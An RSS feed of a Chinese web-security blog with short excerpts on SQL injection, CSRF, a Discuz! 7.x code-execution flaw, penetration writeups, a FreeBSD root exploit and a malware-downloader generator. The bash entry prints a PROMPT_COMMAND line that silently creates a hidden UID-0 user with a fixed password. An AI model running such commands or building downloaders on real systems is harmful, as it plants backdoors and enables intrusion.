<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>暖月</title>
	<atom:link href="http://www.nuanyue.com/feed" rel="self" type="application/rss+xml" />
	<link>http://www.nuanyue.com</link>
	<description>专注WEB、Linux及数据库应用安全。</description>
	<lastBuildDate>Mon, 22 Feb 2010 13:31:01 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>绕过单引号继续注入</title>
		<link>http://www.nuanyue.com/%e7%bb%95%e8%bf%87%e5%8d%95%e5%bc%95%e5%8f%b7%e7%bb%a7%e7%bb%ad%e6%b3%a8%e5%85%a5.html</link>
		<comments>http://www.nuanyue.com/%e7%bb%95%e8%bf%87%e5%8d%95%e5%bc%95%e5%8f%b7%e7%bb%a7%e7%bb%ad%e6%b3%a8%e5%85%a5.html#comments</comments>
		<pubDate>Mon, 22 Feb 2010 13:21:27 +0000</pubDate>
		<dc:creator>暖月</dc:creator>
				<category><![CDATA[原创文章]]></category>
		<category><![CDATA[注入整理]]></category>
		<category><![CDATA[渗透测试]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1192</guid>
		<description><![CDATA[<p><a href="http://www.nuanyue.com/wp-content/uploads/2010/02/9.png"></a>文/图 <a href="http://www.nuanyue.com">饭</a> </p>
<p>Web应用程序一般都会使用数据库来保存各种信息，比如电子商务网站的帐户信息、销售商品的价格，订单、支付细节、和各种不同的权限数值等。数据库中的信息的读取、更新、增加或者删除等都是通过SQL来实现的，因此，在数据交互的环节没有安全过滤净化，则可能易于受到SQL注入攻击，严重的可能导致数据[......]</p><p class='read-more'><a href='http://www.nuanyue.com/%e7%bb%95%e8%bf%87%e5%8d%95%e5%bc%95%e5%8f%b7%e7%bb%a7%e7%bb%ad%e6%b3%a8%e5%85%a5.html' target='_blank'>全文阅读</a></p>]]></description>
		<wfw:commentRss>http://www.nuanyue.com/%e7%bb%95%e8%bf%87%e5%8d%95%e5%bc%95%e5%8f%b7%e7%bb%a7%e7%bb%ad%e6%b3%a8%e5%85%a5.html/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>恭祝春节快乐</title>
		<link>http://www.nuanyue.com/%e6%81%ad%e7%a5%9d%e6%98%a5%e8%8a%82%e5%bf%ab%e4%b9%90.html</link>
		<comments>http://www.nuanyue.com/%e6%81%ad%e7%a5%9d%e6%98%a5%e8%8a%82%e5%bf%ab%e4%b9%90.html#comments</comments>
		<pubDate>Wed, 10 Feb 2010 04:27:33 +0000</pubDate>
		<dc:creator>暖月</dc:creator>
				<category><![CDATA[生活琐碎]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1185</guid>
		<description><![CDATA[<p><strong><span style="color: #c30909;">春节快到了，恭祝大家：虎虎生财 大吉大利  春节快乐 。</span></strong></p>]]></description>
		<wfw:commentRss>http://www.nuanyue.com/%e6%81%ad%e7%a5%9d%e6%98%a5%e8%8a%82%e5%bf%ab%e4%b9%90.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>浅析跨站请求伪造</title>
		<link>http://www.nuanyue.com/%e6%b5%85%e6%9e%90%e8%b7%a8%e7%ab%99%e8%af%b7%e6%b1%82%e4%bc%aa%e9%80%a0.html</link>
		<comments>http://www.nuanyue.com/%e6%b5%85%e6%9e%90%e8%b7%a8%e7%ab%99%e8%af%b7%e6%b1%82%e4%bc%aa%e9%80%a0.html#comments</comments>
		<pubDate>Wed, 06 Jan 2010 17:40:37 +0000</pubDate>
		<dc:creator>暖月</dc:creator>
				<category><![CDATA[原创文章]]></category>
		<category><![CDATA[csrf漏洞]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1159</guid>
		<description><![CDATA[<p>文/<a href="http://www.nuanyue.com">饭</a></p>
  跨站请求伪造(cross-site request forgery)通常缩写为XSRF，直译为跨站请求伪造，即攻击者通过调用第三方网站的恶意脚本或者利用程序来伪造请求，当然并不需要向用户端伪装任何具有欺骗的内容，在用户不知情时攻击者直接利用用户的浏览器向攻击的应用程序提交一个已经预测好请求参数的操作数据包，利用的实质是劫持用户的会话状态，强行提交攻击者构造的具有“操作行为”的数据包。可以看出，最关键的是劫持用户的会话状态，所以说，导致XSRF漏洞的主要原因是会话状态的保持没有唯一时间特征的标识，即是说在使用HTTPCookie传送会话令牌的过程中，应该更谨慎的判断当前用户，而不是简单的通过操作数据包的Cookie值来鉴别，简单的说是每次数据交互时，对提交的数据包实行唯一性标识。
XSRF攻击流程大致如下：
<p style="text-align: center;"><a href="http://www.nuanyue.com/wp-content/uploads/2010/01/1.jpg"><img class="aligncenter" title="1" src="http://www.nuanyue.com/wp-content/uploads/2010/01/1.jpg" alt="" width="517" height="297" /></a></p>
[......]<p class='read-more'><a href='http://www.nuanyue.com/%e6%b5%85%e6%9e%90%e8%b7%a8%e7%ab%99%e8%af%b7%e6%b1%82%e4%bc%aa%e9%80%a0.html' target='_blank'>全文阅读</a></p>]]></description>
		<wfw:commentRss>http://www.nuanyue.com/%e6%b5%85%e6%9e%90%e8%b7%a8%e7%ab%99%e8%af%b7%e6%b1%82%e4%bc%aa%e9%80%a0.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Discuz! 7.x 远程代码执行漏洞</title>
		<link>http://www.nuanyue.com/discuz-7-x-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e.html</link>
		<comments>http://www.nuanyue.com/discuz-7-x-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e.html#comments</comments>
		<pubDate>Wed, 06 Jan 2010 17:06:16 +0000</pubDate>
		<dc:creator>暖月</dc:creator>
				<category><![CDATA[漏洞整理]]></category>
		<category><![CDATA[discuz漏洞]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1154</guid>
		<description><![CDATA[<p>文/<a href="http://www.oldjun.com/blog/index.php/archives/58/" target="_blank">oldjun</a></p>
<p>影响版本：Discuz! 7.1/7.2<br />
漏洞分析：<br />
下面来分析下这个远程代码执行漏洞，这个问题真的很严重，可以直接写shell的：<br />
一、漏洞来自showmessage函数：</p>

<div class="wp_codebox"><table width="100%" ><tr id="p11541"><td class="code" id="p1154code1"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">function</span> showmessage<span style="color: #009900;">&#40;</span><span style="color: #000088;">$message</span><span style="color: #339933;">,</span> <span style="color: #000088;">$url_forward</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">''[......]</span></pre></td></tr></table></div><p class='read-more'><a href='http://www.nuanyue.com/discuz-7-x-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e.html' target='_blank'>全文阅读</a></p>]]></description>
		<wfw:commentRss>http://www.nuanyue.com/discuz-7-x-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>一次简单的“旁注”渗透</title>
		<link>http://www.nuanyue.com/%e4%b8%80%e6%ac%a1%e7%ae%80%e5%8d%95%e7%9a%84%e2%80%9c%e6%97%81%e6%b3%a8%e2%80%9d%e6%b8%97%e9%80%8f.html</link>
		<comments>http://www.nuanyue.com/%e4%b8%80%e6%ac%a1%e7%ae%80%e5%8d%95%e7%9a%84%e2%80%9c%e6%97%81%e6%b3%a8%e2%80%9d%e6%b8%97%e9%80%8f.html#comments</comments>
		<pubDate>Wed, 30 Dec 2009 05:08:46 +0000</pubDate>
		<dc:creator>暖月</dc:creator>
				<category><![CDATA[原创文章]]></category>
		<category><![CDATA[渗透测试]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1130</guid>
		<description><![CDATA[<p style="text-align: left;">文/<a href="http://www.nuanyue.com">饭</a>、Beach</p>
<p>渗透的主机是一朋友的，双线架设的虚拟主机，里面有几个站，架构是apache+php+mysql。在测试前，信息收集是很重要的。从系统信息、数据库信息、网络设备信息、管理员的信息等，都是值的统计分析和利用的。先对主机来端口扫描：</p>
<p style="text-align: center;"><a href="http://www.nuanyue.com/wp-content/uploads/2009/12/11.jpg" rel="lightbox"><img class="size-full wp-image-1131 aligncenter" title="1" src="http://www.nuanyue.com/wp-content/uploads/2009/12/11.jpg" alt="" width="540" height="261" /></a></p>
<p>由图可知：这台服务器开放了80、443、5901等[......]</p><p class='read-more'><a href='http://www.nuanyue.com/%e4%b8%80%e6%ac%a1%e7%ae%80%e5%8d%95%e7%9a%84%e2%80%9c%e6%97%81%e6%b3%a8%e2%80%9d%e6%b8%97%e9%80%8f.html' target='_blank'>全文阅读</a></p>]]></description>
		<wfw:commentRss>http://www.nuanyue.com/%e4%b8%80%e6%ac%a1%e7%ae%80%e5%8d%95%e7%9a%84%e2%80%9c%e6%97%81%e6%b3%a8%e2%80%9d%e6%b8%97%e9%80%8f.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>linux的BASH提权</title>
		<link>http://www.nuanyue.com/linux%e7%9a%84bash%e6%8f%90%e6%9d%83.html</link>
		<comments>http://www.nuanyue.com/linux%e7%9a%84bash%e6%8f%90%e6%9d%83.html#comments</comments>
		<pubDate>Tue, 22 Dec 2009 11:26:48 +0000</pubDate>
		<dc:creator>暖月</dc:creator>
				<category><![CDATA[漏洞整理]]></category>
		<category><![CDATA[linux漏洞]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1120</guid>
		<description><![CDATA[文/<a href="http://hi.baidu.com/xi4oyu">xi4oyu</a>

要利用成功的话，还得看管理员的习惯，是否喜欢用su切换成root
BASH的环境变量
$PROMPT_COMMAND
这个变量保存了在主提示符$PS1显示之前需要执行的命令:
<pre lang="shell">
export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &#038;>/dev/null &#038;& echo kkoo:123456 &#124; /usr/sbin/chpasswd &#038;>/dev/null &#038;& unset PROMPT_COMMAND"
</pre>
<p style="text-align: center;"><a rel="lightbox" href="http://www.nuanyue.com/wp-content/uploads/2009/12/43015717dcc8c37a22a4e973.jpg" target="_blank"><img class="size-full wp-image-953 aligncenter" style="margin: 0px auto 10px; text-align: center; display: block;" title="linux的BASH提权" src="http://www.nuanyue.com/wp-content/uploads/2009/12/43015717dcc8c37a22a4e973.jpg" alt=" alt=" width="540" height="190" /></a></p>[......]<p class='read-more'><a href='http://www.nuanyue.com/linux%e7%9a%84bash%e6%8f%90%e6%9d%83.html' target='_blank'>全文阅读</a></p>]]></description>
		<wfw:commentRss>http://www.nuanyue.com/linux%e7%9a%84bash%e6%8f%90%e6%9d%83.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux下渗透嗅探术</title>
		<link>http://www.nuanyue.com/linux%e4%b8%8b%e6%b8%97%e9%80%8f%e5%97%85%e6%8e%a2%e6%9c%af.html</link>
		<comments>http://www.nuanyue.com/linux%e4%b8%8b%e6%b8%97%e9%80%8f%e5%97%85%e6%8e%a2%e6%9c%af.html#comments</comments>
		<pubDate>Sun, 13 Dec 2009 15:56:15 +0000</pubDate>
		<dc:creator>暖月</dc:creator>
				<category><![CDATA[原创文章]]></category>
		<category><![CDATA[渗透测试]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1069</guid>
		<description><![CDATA[<span>文/<a href="http://www.nuanyue.com">饭</a> Beach</span>

内网渗透在攻击层面，其实更趋向于社工和常规漏洞检测的结合，为了了解网内防护措施的设置是通过一步步的刺探和经验积累，有时判断出错，也能进入误区。但是如果能在网内进行嗅探，则能事半功倍，处于一个对网内设置完全透明的状态。本文将从一个注点引发的突破，到控制整个内网的全过程来跟大家讨论，内网的渗透嗅探术和安全防护一些内容。

在寻找突破时，更多的是从应用服务来，而应用服务最直观的信息采集，就是端口扫描，不同的应用，开放的服务不一样。所以，在对网络进行信息收集时，大概分为这样两步： 端口探测，程序指纹分析。在端口探测方面，个人喜欢用SuperScan来快速对网段里的应用进行判断，如图：
<p style="text-align: center;"><a rel="lightbox" href="http://www.nuanyue.com/wp-content/uploads/2009/12/1.jpg" target="_blank"><img class="size-full wp-image-953 aligncenter" style="margin: 0px auto 10px; text-align: center; display: block;" title="内网渗透嗅探术" src="http://www.nuanyue.com/wp-content/uploads/2009/12/1.jpg" alt="内网渗透嗅探术" width="540" height="285" /></a></p>

在掌握端口信息后，就要对服务应用程序的指纹进行分析，主要包括版本号、已知的漏洞信息、常规配置信息、针对此应用流行的攻击方法等。本文试着对网内一台提供WEB服务的主机作为突破口，提交一个畸形的请求，如图：[......]<p class='read-more'><a href='http://www.nuanyue.com/linux%e4%b8%8b%e6%b8%97%e9%80%8f%e5%97%85%e6%8e%a2%e6%9c%af.html' target='_blank'>全文阅读</a></p>]]></description>
		<wfw:commentRss>http://www.nuanyue.com/linux%e4%b8%8b%e6%b8%97%e9%80%8f%e5%97%85%e6%8e%a2%e6%9c%af.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>XMLDOM下载者生成器(xmldown.hta)</title>
		<link>http://www.nuanyue.com/xmldom%e4%b8%8b%e8%bd%bd%e8%80%85%e7%94%9f%e6%88%90%e5%99%a8xmldown-hta.html</link>
		<comments>http://www.nuanyue.com/xmldom%e4%b8%8b%e8%bd%bd%e8%80%85%e7%94%9f%e6%88%90%e5%99%a8xmldown-hta.html#comments</comments>
		<pubDate>Tue, 08 Dec 2009 03:21:56 +0000</pubDate>
		<dc:creator>暖月</dc:creator>
				<category><![CDATA[工具收集]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1059</guid>
		<description><![CDATA[<p style="text-align: left;">文/<a href="http://hi.baidu.com/myvbscript/blog/item/4de26bece08fe7db2e2e2104.html" target="_blank">lcx</a></p>
<p>以下代码保存成hta文件，可生成js和vbs下载者</p>

<div class="wp_codebox"><table width="100%" ><tr id="p10594"><td class="code" id="p1059code4"><pre class="javascript" style="font-family:monospace;"><span style="color: #339933;">&#60;</span>script type<span style="color: #339933;">=</span><span style="color: #3366CC;">&#34;text/javascript&#34;</span><span style="color: #339933;">&#62;&#60;!--</span>mce<span style="color: #339933;">:</span><span style="color: #CC0000;">0</span><span style="color: #339933;">--&#62;&#60;/</span>script<span style="color: #339933;">&#62;</span>
<span style="color: #339933;">&#60;</span>h4<span style="color: #339933;">&#62;</span>1.生成下载用的xml文件<span style="color: #339933;">&#60;/</span>h4<span style="color: #339933;">&#62;</span>
选[......]</pre></td></tr></table></div><p class='read-more'><a href='http://www.nuanyue.com/xmldom%e4%b8%8b%e8%bd%bd%e8%80%85%e7%94%9f%e6%88%90%e5%99%a8xmldown-hta.html' target='_blank'>全文阅读</a></p>]]></description>
		<wfw:commentRss>http://www.nuanyue.com/xmldom%e4%b8%8b%e8%bd%bd%e8%80%85%e7%94%9f%e6%88%90%e5%99%a8xmldown-hta.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FreeBSD local r00t zeroday</title>
		<link>http://www.nuanyue.com/freebsd-local-r00t-zeroday.html</link>
		<comments>http://www.nuanyue.com/freebsd-local-r00t-zeroday.html#comments</comments>
		<pubDate>Tue, 08 Dec 2009 03:19:31 +0000</pubDate>
		<dc:creator>暖月</dc:creator>
				<category><![CDATA[漏洞整理]]></category>
		<category><![CDATA[FreeBse漏洞]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1057</guid>
		<description><![CDATA[<p>Discovered &#38; Exploited by Nikolaos Rangos also known as Kingcope.<br />
Nov 2009 &#8220;BiG TiME&#8221;</p>
<p>&#8220;Go fetch your FreeBSD r00tkitz&#8221; // [......]</p><p class='read-more'><a href='http://www.nuanyue.com/freebsd-local-r00t-zeroday.html' target='_blank'>全文阅读</a></p>]]></description>
		<wfw:commentRss>http://www.nuanyue.com/freebsd-local-r00t-zeroday.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>图片引发验证的社工利用</title>
		<link>http://www.nuanyue.com/%e5%9b%be%e7%89%87%e5%bc%95%e5%8f%91%e9%aa%8c%e8%af%81%e7%9a%84%e7%a4%be%e5%b7%a5%e5%88%a9%e7%94%a8.html</link>
		<comments>http://www.nuanyue.com/%e5%9b%be%e7%89%87%e5%bc%95%e5%8f%91%e9%aa%8c%e8%af%81%e7%9a%84%e7%a4%be%e5%b7%a5%e5%88%a9%e7%94%a8.html#comments</comments>
		<pubDate>Sun, 29 Nov 2009 06:52:53 +0000</pubDate>
		<dc:creator>暖月</dc:creator>
				<category><![CDATA[原创文章]]></category>
		<category><![CDATA[csrf漏洞]]></category>
		<category><![CDATA[安全审计]]></category>
		<category><![CDATA[跨站漏洞]]></category>

		<guid isPermaLink="false">http://www.nuanyue.com/?p=1029</guid>
		<description><![CDATA[<span style="color: #ff0000;">文/<a href="http://www.nuanyue.com/浅谈图片引发验证的社工利用.html">饭</a></span>

在这充满诱惑的网络，恶意攻击者的攻击手法层出不穷。而其中颇具难度的社会工程攻击在取得用户的信任的手段方面，往往更倾向于伪装用户服务提供商，或者是在用户交互时，直接进行欺骗。比较典型的网络钓鱼攻击是将用户引诱到一个通过精心设计与用户信任非常相似的钓鱼网站，让用户在不易察觉的情况下提供用户的个人敏感信息。在2004年，国内也曾出现过假冒银行的网站，比如假冒中国工商银行的网站。而这一篇文章，将主要介绍HTML语言里的图片标签引用而诱引的验证漏洞和其伪装的过程。
在milw0rm.com网站，petros发布一篇题为《Image Authentication Injection Paper + PoC》的文章，里头提到通过创建一个php文件向客户端的浏览器发送401未经授权的状态而导致浏览器显示一个登录对话框（显示给用户好像是从目标网站）发起的一个授权认证对话框，而恶意攻击者会诱使用户输入帐户或者密码之类的敏感信息从而导致钓鱼式的攻击。其流程如下：
<p style="text-align: center;"><a rel="lightbox" href="http://www.nuanyue.com/wp-content/uploads/2009/11/41.jpg" target="_blank"><img class="size-full wp-image-953 aligncenter" style="margin: 0px auto 10px; text-align: center; display: block;" title="图片引发验证的社工利用" src="http://www.nuanyue.com/wp-content/uploads/2009/11/41.jpg" alt="图片引发验证的社工利用" width="470" height="385" /></a></p>

HTTP是一种基于请求与响应模式的、无状态的、应用层的协议，客户端向服务器发送一个请求，请求头包含请求的方法、URL、协议版本、以及包含请求修饰符、客户 信息和内容的类似于MIME的消息结构。服务器以一个状态行作为响应，相应的内容包括消息协议的版本，成功或者错误编码加上包含服务器信息、实体元信息以及可能实体内容。对整个过程进行抓包:[......]<p class='read-more'><a href='http://www.nuanyue.com/%e5%9b%be%e7%89%87%e5%bc%95%e5%8f%91%e9%aa%8c%e8%af%81%e7%9a%84%e7%a4%be%e5%b7%a5%e5%88%a9%e7%94%a8.html' target='_blank'>全文阅读</a></p>]]></description>
		<wfw:commentRss>http://www.nuanyue.com/%e5%9b%be%e7%89%87%e5%bc%95%e5%8f%91%e9%aa%8c%e8%af%81%e7%9a%84%e7%a4%be%e5%b7%a5%e5%88%a9%e7%94%a8.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
